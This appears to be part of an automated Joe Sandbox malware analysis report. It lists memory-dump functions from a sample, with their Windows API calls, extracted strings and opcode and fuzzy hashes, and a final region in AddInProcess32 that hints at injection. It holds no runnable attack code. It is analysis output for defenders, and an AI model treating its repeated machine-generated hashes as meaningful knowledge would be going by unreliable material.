                                                        • Instruction Fuzzy Hash: BB514A30E0C25786F6D4BB399891775BE94AF08742FD04537E82DA6392DE3CE4518AB3
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Current$Thread$DuplicateExceptionFailFastHandleProcessQueryRaiseVirtual
                                                        • String ID:
                                                        • API String ID: 510365852-3916222277
                                                        • Opcode ID: b1b1fbfb92f544876441bc4b4b9ec3831bb2498fef253353d8dffe26a98b5e26
                                                        • Instruction ID: e7f54519b51f2ad08fe88cfbd6fb52e670ab7d379f2c2d6342c9ae9b49a4b8f5
                                                        • Opcode Fuzzy Hash: b1b1fbfb92f544876441bc4b4b9ec3831bb2498fef253353d8dffe26a98b5e26
                                                        • Instruction Fuzzy Hash: 8E118072A08B818AD790EF25A4412AAB761FB447B4F940336E6BD5BBD6CF38D5418701
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: SwitchThread
                                                        • String ID:
                                                        • API String ID: 115865932-0
                                                        • Opcode ID: cc35ecd5a93063da1183701248f17dca1c596e2e1d8d9986a40f28483dcd9575
                                                        • Instruction ID: 50769b7a0465078e952e7d78a35f7e78499048e1a314c7a0f4d7688191b08d6e
                                                        • Opcode Fuzzy Hash: cc35ecd5a93063da1183701248f17dca1c596e2e1d8d9986a40f28483dcd9575
                                                        • Instruction Fuzzy Hash: 01814920A0C24286F6D6BB39D890735FED0AF4A755F90013BD96DA6791DE3DF4108A72
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8155321a93176bc4c4200af923682af65ca18711955211ed52f216cd2b673b30
                                                        • Instruction ID: b8699dbd67cd16afdbc24e4a853b8b19ccde78844ad0fa8e78eae828340de72a
                                                        • Opcode Fuzzy Hash: 8155321a93176bc4c4200af923682af65ca18711955211ed52f216cd2b673b30
                                                        • Instruction Fuzzy Hash: CD71A421A0978281FBD1BB359950379EBA1AF44B94F890437DE2D27B95DF3CE4208372
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave
                                                        • String ID:
                                                        • API String ID: 3168844106-0
                                                        • Opcode ID: ee0fd4760e92663805b7709b2b23ebc5e8a7ab991dfd8e4368035a15539f3436
                                                        • Instruction ID: c184a46a9fdb6582113c9fe1ea4d0119ece59f4ecae300b4cc2a505790bde755
                                                        • Opcode Fuzzy Hash: ee0fd4760e92663805b7709b2b23ebc5e8a7ab991dfd8e4368035a15539f3436
                                                        • Instruction Fuzzy Hash: 86E1F262B09A4685DA949F64D9947B8B7A0EF047E6F814333D93D67BD8DF38D028C312
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFailFastRaise
                                                        • String ID: Process is terminating due to StackOverflowException.
                                                        • API String ID: 2546344036-2200901744
                                                        • Opcode ID: a73f9b0b1186b8bf137041686a0ee60befa2ebf5b9cf55ecf46c091e51a068e4
                                                        • Instruction ID: 566b8e22e3a0d42cb0a30cca3cd4d00587325b639eb775079a53e0ea5e1091a4
                                                        • Opcode Fuzzy Hash: a73f9b0b1186b8bf137041686a0ee60befa2ebf5b9cf55ecf46c091e51a068e4
                                                        • Instruction Fuzzy Hash: 3351B821F0964281EFE0AB25D480379AB90FF48BA5FC54133DA1E67790DF3DE5A58392
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(?,?,?,?,00000233C2400000,00007FF7E35B2EBD,?,?,00000000,00007FF7E359F8AC,?,FFFFFFFF,47AE147AE147AE15,00007FF7E358945C), ref: 00007FF7E35B2E12
                                                        • GetProcAddress.KERNEL32(?,?,?,?,00000233C2400000,00007FF7E35B2EBD,?,?,00000000,00007FF7E359F8AC,?,FFFFFFFF,47AE147AE147AE15,00007FF7E358945C), ref: 00007FF7E35B2E2C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetEnabledXStateFeatures$kernel32.dll
                                                        • API String ID: 2574300362-4754247
                                                        • Opcode ID: 14ea90d1c4bf5a15a4085266709c85a67ad0a07a71323ba950ff44953a265e56
                                                        • Instruction ID: cd28de0588b18b77e3fdefc5be4f5ca69aad815db21f7fe9d0a9fff299a23d1a
                                                        • Opcode Fuzzy Hash: 14ea90d1c4bf5a15a4085266709c85a67ad0a07a71323ba950ff44953a265e56
                                                        • Instruction Fuzzy Hash: 4B21E451F2C15242FFE8937AE051379A7819B58390FC8483BD90E957D4DD3DE9814622
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetEnabledXStateFeatures$kernel32
                                                        • API String ID: 2574300362-4273408117
                                                        • Opcode ID: 274e0da2db24af44fa31abf1e79a32452a2f4646b1ed88df6da63e7f0bd2eccf
                                                        • Instruction ID: 1e7bb77d167909cb7c754cf160f162dfb59856bccc99d63b2bffa13c0f470ccb
                                                        • Opcode Fuzzy Hash: 274e0da2db24af44fa31abf1e79a32452a2f4646b1ed88df6da63e7f0bd2eccf
                                                        • Instruction Fuzzy Hash: 5CE08608F1670285FFC8B7625891374D7A12F48781FCC5136C90D65390EE3CE75A9722
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetEnabledXStateFeatures$kernel32
                                                        • API String ID: 2574300362-4273408117
                                                        • Opcode ID: ce6f5296a204aba61ce9ef49dc43d2f12b23842fbe95b74c7dd249d319ed59f7
                                                        • Instruction ID: ee596af704946ddbafbd0c1e412240648c561781ee0c78b208619c8c4c3e1a90
                                                        • Opcode Fuzzy Hash: ce6f5296a204aba61ce9ef49dc43d2f12b23842fbe95b74c7dd249d319ed59f7
                                                        • Instruction Fuzzy Hash: F2E02600F2A20289FFC8BB32988137497A06F98701FCC0036CA0C11390ED3CE34A9722
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: SwitchThread
                                                        • String ID:
                                                        • API String ID: 115865932-0
                                                        • Opcode ID: f4aaa3f96c492ce6e17f0f5d835cb774c61d338c5d6bba280d5d4821285017cf
                                                        • Instruction ID: 783681466f85e1339860326e3164e2fb89dad36a2047007f4e6903c41cddc45a
                                                        • Opcode Fuzzy Hash: f4aaa3f96c492ce6e17f0f5d835cb774c61d338c5d6bba280d5d4821285017cf
                                                        • Instruction Fuzzy Hash: 8841D531A081D681EFE4AA35C05033DEB90EB84F95FB48537D62E567C5CE3CE8419762
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: SwitchThread
                                                        • String ID:
                                                        • API String ID: 115865932-0
                                                        • Opcode ID: 44b941e54b3c05b20f0b851b031452e57e334a5e19445be4892a4e80d52cd89e
                                                        • Instruction ID: 332a30051d7d772d8146528f5109bca80cf4c9ff46b202fd5208ef9003c5bdc9
                                                        • Opcode Fuzzy Hash: 44b941e54b3c05b20f0b851b031452e57e334a5e19445be4892a4e80d52cd89e
                                                        • Instruction Fuzzy Hash: 51512720E0826346F6D4BB399981775BF94AF08742F95403BE82AA63D1DE3CF9108273
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: BreakDebug
                                                        • String ID:
                                                        • API String ID: 456121617-0
                                                        • Opcode ID: e4ab8514af3f6f014f6506373d7b9cbb823d7638c04cae421d012170a137b048
                                                        • Instruction ID: 382b1d941a0307d853cbfa0f98534a87d1fbc7b216e1973a4d5e29644ed357f1
                                                        • Opcode Fuzzy Hash: e4ab8514af3f6f014f6506373d7b9cbb823d7638c04cae421d012170a137b048
                                                        • Instruction Fuzzy Hash: D841E522A0D68181FAD17B31A140379EFA0EF84B98FA90436DE5D27795DF3CE441D762
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: BreakDebug
                                                        • String ID:
                                                        • API String ID: 456121617-0
                                                        • Opcode ID: 5f868e6883e4306e4798fc5c7dca6ba7319e688e635161da728f78dd99401986
                                                        • Instruction ID: 8d5ad7d0d660254e22f64ab810f59e43bc68b99b42d7eb8f222c7010b7077cdf
                                                        • Opcode Fuzzy Hash: 5f868e6883e4306e4798fc5c7dca6ba7319e688e635161da728f78dd99401986
                                                        • Instruction Fuzzy Hash: F631C422A0978282EAA67F399140379EBE4EF45B84F890036DE5D27795DF3CE4418722
                                                        APIs
                                                        • WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E3576291), ref: 00007FF7E357AB44
                                                        • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E3576291), ref: 00007FF7E357AB4E
                                                        • CoWaitForMultipleHandles.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E3576291), ref: 00007FF7E357AB6D
                                                        • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E3576291), ref: 00007FF7E357AB81
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLastMultipleWait$HandlesObjects
                                                        • String ID:
                                                        • API String ID: 2817213684-0
                                                        • Opcode ID: 2e4193dc27507b0cc0785436bf69825b5bf5a88872f1136b1b91a9cdfbe48115
                                                        • Instruction ID: bd42a6f7609702b917f25ef2634000dd2e4ed9c5f3a79b6612b7464e2683e814
                                                        • Opcode Fuzzy Hash: 2e4193dc27507b0cc0785436bf69825b5bf5a88872f1136b1b91a9cdfbe48115
                                                        • Instruction Fuzzy Hash: 6311E93171C655C6E7949B36B80822AFBA2FB44B91F90013AFACD93BA4CF3CD5048B40
                                                        APIs
                                                        • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7E35D97EB), ref: 00007FF7E35DA6AC
                                                        • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7E35D97EB), ref: 00007FF7E35DA6ED
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 305dc0d90ba247bf77b3081513aed6e1274f9ee9982620d9ea7225f6e90881e8
                                                        • Instruction ID: a6f9415f308de42d2eab567e0af4203b43ffddbca5d551ba2003f59b73868207
                                                        • Opcode Fuzzy Hash: 305dc0d90ba247bf77b3081513aed6e1274f9ee9982620d9ea7225f6e90881e8
                                                        • Instruction Fuzzy Hash: 90115B32A08B4182EB619F25F80026ABBE1FB88B84F984232DB8C57764DF3CC555CB40
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF7E358D326,?,-8000000000000000,00000001,00007FF7E359C4E6), ref: 00007FF7E35A14FA
                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF7E358D326,?,-8000000000000000,00000001,00007FF7E359C4E6), ref: 00007FF7E35A1569
                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF7E358D326,?,-8000000000000000,00000001,00007FF7E359C4E6), ref: 00007FF7E35A15B2
                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF7E358D326,?,-8000000000000000,00000001,00007FF7E359C4E6), ref: 00007FF7E35A15C8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave
                                                        • String ID:
                                                        • API String ID: 3168844106-0
                                                        • Opcode ID: 0de8c96e308dc89a29d8a1a55691b7ed571b8c24adcec8239b49f7916ce6b8ad
                                                        • Instruction ID: 451853c717027375f80ea651228c96f9cb3e113c53b9644e4c4af105a9143f48
                                                        • Opcode Fuzzy Hash: 0de8c96e308dc89a29d8a1a55691b7ed571b8c24adcec8239b49f7916ce6b8ad
                                                        • Instruction Fuzzy Hash: 7D518121A0874281E690EB25E480374FB90FB08795FC40533DE6D67B95CF3CE665D362
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF7E3593D9F,?,?,?,00007FF7E35A006A), ref: 00007FF7E3593C6A
                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF7E3593D9F,?,?,?,00007FF7E35A006A), ref: 00007FF7E3593CAC
                                                        • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF7E3593D9F,?,?,?,00007FF7E35A006A), ref: 00007FF7E3593CD7
                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF7E3593D9F,?,?,?,00007FF7E35A006A), ref: 00007FF7E3593CF8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave
                                                        • String ID:
                                                        • API String ID: 3168844106-0
                                                        • Opcode ID: 99be274ada0fb868839034c500c2fa40c65a7dde01cde5b2fecab08216d2b082
                                                        • Instruction ID: 58d2823bfe41f13bd611ed3438e2b5ae3955b30dfdde644da83564dae7f78520
                                                        • Opcode Fuzzy Hash: 99be274ada0fb868839034c500c2fa40c65a7dde01cde5b2fecab08216d2b082
                                                        • Instruction Fuzzy Hash: F521F121A1890791FA90EB24E8C63B4BB54EF18392FC50237E92D65AD5DF7CD174C3A2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2528733341.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_f10000_AddInProcess32.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: p
                                                        • API String ID: 0-2181537457
                                                        • Opcode ID: 8a862624c9c8d19efa1d26523557a9dd9aec59f6d0bedcae5372ede4c36b5f57
                                                        • Instruction ID: c324cf5d125bb8192cef44f8f6ca7c753f1731bc8e09bb09a925063f2708de42
